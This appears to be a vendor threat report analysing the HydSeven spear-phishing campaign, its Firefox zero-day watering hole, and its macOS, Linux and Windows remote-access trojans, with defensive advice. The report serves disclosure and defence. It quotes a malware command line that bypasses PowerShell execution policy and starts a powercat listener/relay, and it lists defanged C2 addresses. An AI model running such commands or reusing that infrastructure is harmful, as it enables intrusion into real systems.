Threat Summary: Operation BlockChain Gang; Advanced Exploits, Commodity Tools

15 November 2019

Executive Summary

The research team at Prevailion has detected and analyzed Linux and Windows remote-access trojans associated with the advanced threat actor known as “HydSeven.” This threat group initially maintained a relatively low profile through the use of bespoke commodity malware. However, they caught the attention of the information security community when performing a highly targeted spear-phishing operation in the summer of 2019.

In this campaign, which we have dubbed “Operation BlockChain Gang,” the threat actors used compromised Cambridge University infrastructure to phish and water-hole their targets. In analyzing the campaign, Prevailion has associated two new malware families to this group. In addition to the previously known Mac OS X agent, we’ve recently analyzed the Windows and Linux variants.

By illustrating how potential victims could have been infected by the group and detailing the capabilities of the malware, this report is intended to inform at-risk organizations and help them understand appropriate steps to avoid compromise.

Campaign Overview

HydSeven appears to add a new twist to a common method of infection via email, known as “phishing.” While this particular technique is not new, victims rarely report actual interactions with threat actors. In this case, the threat actors crafted an innocuous email asking if the target would be willing to look over some applications for an award presumably in their area of expertise. In a statement about the attack, CoinBase reported, “We learned that over 200 individuals were targeted by this attacker.”

It wasn’t until after the victim responded, indicating that they would be willing to help, that they were sent the malicious link. That link would bring the victim to a threat actor-controlled “watering-hole” hostname on the Cambridge University domain. If someone visited this website from a Firefox browser, their host machine would be exploited by what was a 0-day exploit, later identified as CVE-2019-11707 and CVE-2019-11708. However, the actors did appear to make one small mistake at first; they did not add a message saying that the webpage could only be rendered in Firefox. Thus, some potential victims were saved from compromise simply because they used their default browser. If someone was unfortunate enough to have visited the website using Firefox, they would have been exploited, and an agent would have been deployed to their workstation.

While other researchers have previously documented the functionality of the Mac OS X payload, Prevailion has, with moderate confidence, associated a Windows and Linux component to this threat actor. We speculate that the threat actors likely did not go through the effort to obtain certificates for Mac OS X and Linux payloads, as those systems are less likely to have antivirus software running on them. These payloads were fully functional remote-access tools that allowed the threat actors to run commands, as well as send and receive data from their command and control servers (C2s).

This case study shows the lengths these advanced actors would go to establish access in a high-value network. Based off that same CoinBase report, it was calculated that only 2.5% of people who received the initial email received that final link. This would suggest that the threat actors expended all this effort to gain access to approximately five organizations, potentially in the financial sector.

This report highlights the emphasis that threat actors are placing on organizations that store and retain significant amounts of data about their customer base. We strongly encourage these organizations to assess their existing risk profiles, implement host-based defenses, and put incident response plans in place prior to an event.

Initial Contact

According to a presentation given in October 2019 by a Line employee, potential victims of this campaign received a targeted email from a compromised Cambridge account asking them to “assess the quality of competing projects … for the [Cambridge University] Adam’s Prize.” The Adam’s Prize is a highly respected contest, held every year by Cambridge and awarded to a person, or persons, who contributed original research to a given discipline, typically within the field of mathematics.

The initial email appeared innocuous at first glance, asking recipients if they would be willing to help evaluate applications for the Adam’s award. These threat actors even went through the process of creating a LinkedIn account for the persona that sent the emails. While creating a fake profile has become typical of targeted attacks, corresponding with the victims was highly abnormal. In this particular case, correspondence went back and forth — with victims inquiring about requirements and terms of participation — but the link to the water-holed hostname was still not sent until the victim agreed to help.This unique tactic reveals that the threat actors are expanding the social engineering aspect and displaying a level of audacity far beyond the norm

The email contained a link with a unique username and password for the victim. The webpage seemed innocuous, with only one suspicious aspect: a message indicating that the page would only work when viewed in Firefox with a link to download the latest version. We speculate that the actors added this particular message after reading an article such as this one, by Robert Heaton. When Heaton visited the water-holed site, he did not get the Firefox prompt. In his words:

if “Gregory” had added just 7 extra words to this page –

“THIS PAGE MUST BE VIEWED IN FIREFOX” – I would have been screwed.


Around the same time, May 20, 2019, CoinBase experienced a similar attack. This was first reported by @SecurityGuyPhil, in a series of tweets. Those tweets were later turned into a medium post, which can be found here.

The CoinBase story was identical to what transpired at Line, when victims received emails from a presumably compromised account associated with Cambridge. Only after the user interacted with the threat actor and expressed a willingness to help did they receive the malicious link. If the victim visited the water-holed website from a Firefox browser, it would call a malicious javascript file from the domain analyticsfit[.]com/init.js that was hosted on the IP address 54[.]38[.]93[.]182.

The Firefox Exploit

Once the victim clicked on the link or visited the website with the correct browser and operating system, it would trigger the malicious javascript hosted on analyticsfit[.]com. The first exploit, CVE-2019-11707, allowed the program to crash in a certain way, which was discovered and documented. The second exploit, CVE-2019-11708, would allow remote code execution on the compromised victim’s machine. Both CVEs were reported by Samuel Groß of Google Project Zero. On his Twitter account, Samuel stated the following about the vulnerability:

“So all in all this looks like a bug collision (not a 1day constructed from the bugfix, not a leak from any of the bug trackers). My guess is that someone was looking for that bug pattern or even specifically for a variant of CVE-2019-[9810] and found the bug that way”

Based upon Prevailion’s analysis, the exploit would not allow for remote code execution on Chrome due to Chrome’s use of a different JavaScript engine.

MacOS Agent

Once the exploit was run, the code would obtain the first-stage agent from the C2 server, located at hxxp://185[.]162[.]131[.]96/i/IconServicesAgent. This agent was analyzed extensively in a series of blog posts by Digita Security, in which it was identified as a variant of “NetWire.” A commercially available “systems administration tool”, NetWire can be purchased online at a rate of $120 per year. Despite its low cost, cracked versions of this software are also available to download for free on the internet.

Of note, while NetWire is commercially available, the sample had a low detection  rate when originally submitted to VirusTotal on June 2, 2019. At that time, it was flagged as malicious by only one vendor. Since then, though, several companies have created signatures for this tool. In the course of our investigation, we identified two new samples associated with this group. Interestingly, one was named “fuck_tencent” — potentially a reference the Chinese conglomerate Tencent Holdings Ltd.

Once installed on the victim machine, the application masqueraded as the “Finder” application. It then attempted to gather host-based credentials and establish persistence. After gathering host-based information and presumably determining that the environment was of interest, it would install the second, more robust payload, later identified as “Ekoms”. Digita Security performed an extensive write-up on this sample, as well, which can be found here.

Like most second-stage remote-access trojans, it would allow the threat actor to deploy keyloggers, grab screenshots, transfer files, and send audio captures. As with the previous tool, when this sample was submitted to VirusTotal, it was not flagged as malicious by any AV vendors. Initial detection rate for the Ekom sample was 0/53 when uploaded on June 20, 2019

Analysis of Linux Agent

During our investigation, the Prevailion team found three elf files designed for Linux-based operating systems. Like most of the Mac samples, when the file was initially uploaded to VirusTotal, it had a detection rate of zero. And, even as of November 10, it’s only being detected by three vendors.

Initial detection rate of 0/53 for the Linux agent uploaded on March 29th, 2019

The first agent we analyzed was a fully functional remote-access trojan designed for Red-Hat Linux. We hypothesize that the infection mechanism was similar to the one used to deploy the MacOS agent. Once the agent was sent to the machine, it would install itself as a desktop application.

Screenshot of the RC4 embedded within the sample

As in the aforementioned Mac samples, it contained the same RC4 encryption key, used to decrypt a section of code containing the C2 IP address, Host-ID, and Default Group that would be set by the threat actor.

Decrypted output of the encrypted code

When we analyzed this agent, it would gather the machine’s current IP address by making a request to checkip[.]dyndns[.]org. The agent had the ability to gather information about the victim machine and send various commands. Some examples include retrieving:

  • Information about the user (getuid, getpwuid)
  • Information about the host (gethostname, sysinfo, sysconf, cpuinfo)
  • Information about environment variables (getenv)
  • Information about process and the parent process
  • Run commands (from /bin/bash or /bin/sh)
  • Read, write, and delete files
  • Make and remove directories
  • Kill a process

The agent would persist by auto-starting on login. The functionality suggested its primary purpose was to act as a proxy, or relay, to send commands and data from the threat actors outside the network to other agents within the network. One particular aspect of the agent was the use of a hard-coded user-agent string:

“Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko”

This was of particular note, as the agent was designed for Linux, but this was the typical user-agent string for a Windows operating system version 8.1 or Server 2012.

Analysis of the Windows Agent

While the previous case studies provided insights into how the threat actor performed in the MacOS environment, looking at those same C2, we identified another campaign from earlier this year. The two IP addresses referenced in the CoinBase targeting were:

  • 185[.]162[.]131[.]96
  • 89[.]34[.]111[.]113.

Vitali Kremez, @VK_Intel, later noted that he found a signed Windows binary, with the certificate being issued to “SANJ CONSULTING LTD”. Once the binary was analyzed, it communicated with the same C2 as the MacOS malware from the CoinBase attack.

“cmd.exe /c powershell; Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope Process -Force;. “%s”; powercat -l -p 4000 -r tcp:;

goto :loop”

This binary was a compiled version of PowerCat, an open-source framework project written in PowerShell. We have associated additional PowerCat samples with the same threat group. However, they were not signed by a certificate authority. To avoid detection from common strings, they usedan obfuscator such as “Invoke-Obfuscation”. PowerCat is a fully functional remote-access trojan that:

  • Performed upload/download files
  • Performed execution of PowerShell commands
  • Included functionality for DNSCat2as an alternative communications channel
  • Acted as a relay to other agents inside the network perimeter

Another notable feature of these agents was their ability to act as a relay. This is significant because once the threat actors have access to a relay on the network behind the firewall, there are typically few, if any, appliances in place to detect the lateral movement of the actor. These relay agents allow the threat actors to access more sensitive data hosted on servers that are only accessible once a client has been authenticated and permitted into the local network.

Overlap with Previous Campaigns

One other significant element was the use of a common RC4 key across the Windows, Linux, and Mac-based samples. The use of this shared RC4 key and overlapping C2s led us to believe, with moderate confidence, that all these samples can be associated to the same threat actor. This threat actor group has previously been reported upon as being active in both Japan and Poland.


This threat actor has showcased a number of techniques that would categorize them as an extremely advanced adversary. This campaign highlights the focus on large organizations that store and retain significant amounts of data about their customer base.

Large crypto exchanges, corporations, and other organizations storing sensitive customer information should continuously assess their risk profiles and employ host-based defenses on their systems. For example, while the MacOS agent was initially undetected by AV, the use of a personal firewall — such as LuLu for Mac or IPtables for Linux — would have alerted the user to an outbound connection. And, when browsing the internet, users can mitigate risk by making use of NoScript, a plugin that blocks all Javascript, Java, and Flash unless explicitly allowed by the user.

While there is currently no single solution to protect every system with 100% fidelity, these products can significantly reduce risk by displaying a pop-up to alert the end user about activity in the background of their system. This gives them a greater opportunity to at least detect abnormalities and potentially avoid a breach.

Organizations should also work on preparing and rehearsing their incident response plans. Thus, if an event does occur, they will have an established procedure regarding who to contact and what to do. Furthermore, in an incident response investigation, it is critical to check the entire network, not just the machines where an alert was detected. This includes Linux-based workstations and servers, as these systems sometimes get overlooked. If you feel that your Linux-based system may have been compromised, guidelines on how to inspect that system can be found here.

While it’s important to have a security team on staff, the end user is always your first line of defense to detect suspicious activity. For example, if someone receives an email asking them to evaluate an international award in economics, and they are not an economist, they should consult their network security staff. If you have host-based firewalls in place and a user suddenly starts seeing a pop-up message about a cURL command connecting to a server in Hong Kong, there may be an issue at hand. Training your employees to take these alerts seriously could prevent a major incident from occurring.

Indicators of Compromise

The following is a list of samples that have been associated with this threat group. This list was comprised from information from Prevailion employees and the open source community.

Sending Emails



Exploit Server



Mac Agents





Linux Agents




Windows Agents









IP Addresses










The Latest

Prevailion CEO, Karim Hijazi – Cheddar News- FCC commissioner calls on Apple and Google to ban TikTok app

A member of the FCC renewed urgency calls on Apple and Google to remove TikTok from their app stores, raising concerns that TikTok’s Chinese-based parent company is collecting user data that is being accessed in China.

IRONSCALES Cyber Security Heroes: The New Cyber Era Post Ukraine Invasion

What Wicked Webs We Un-weave

What Wicked Webs We Un-weave: Wizard Spider once again proving it isn’t you, it isn’t me; we search for things that you can’t see Authored by: Matt Stafford and Sherman Smith Executive summary: In late January 2022, Prevailion’s Adversarial Counterintelligence Team (PACT) identified extensive phishing activity designed to harvest credentials for Naver. Naver is a […]

Copyright 2023 Prevailion, Inc. All rights reserved.    

Disclaimer: Gartner “Cool Vendors in Security Operations and Threat Intelligence,” Mitchell Schneider, Ruggero Contu, John Watts, Craig Lawson, October 13, 2020. GARTNER is a registered trademark and service mark of Gartner, Inc. and/or its affiliates in the U.S. and internationally and is used herein with permission. All rights reserved. Gartner Disclaimer: The GARTNER COOL VENDOR badge is a trademark and service mark of Gartner, Inc. and/or its affiliates and is used herein with permission. All rights reserved. Gartner does not endorse any vendor, product or service depicted in its research publications and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s Research & Advisory organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.